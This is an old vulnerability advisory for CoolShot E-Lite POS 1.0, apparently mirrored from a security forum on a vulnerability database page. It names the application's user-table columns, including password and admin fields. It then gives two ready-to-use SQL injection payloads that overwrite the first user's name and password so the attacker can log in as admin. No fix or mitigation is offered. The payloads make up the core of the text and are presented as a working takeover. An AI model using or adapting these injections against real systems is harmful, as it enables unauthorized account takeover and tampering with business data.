Lucene search
SecurityvulnsSECURITYVULNS:DOC:18492HistoryNov 25, 2007 - 12:00 a.m.
Aria-Security.net: CoolShot E-Lite POS 1.0
2007-11-2500:00:00
vulners.com
139
Aria-Security Team
http://aria-security.net
CoolShot E-Lite POS 1.0
http://coolshot.net/index.php/works/49-e-lite-pos
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1108#post1108
Published on November 24 2007
users.user_id
users.user_name
users.user_email
users.user_admin
users.user_auth
users.user_pw
use these two queries
-1' UPDATE users set user_name= 'admin' Where(user_iD= '1');–
-1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');–
there you go with the user admin and password hacked.
Credits Goes to Aria-Security Team
A SPECIAL THANKS TO: AurA
Regards,
The-0utl4w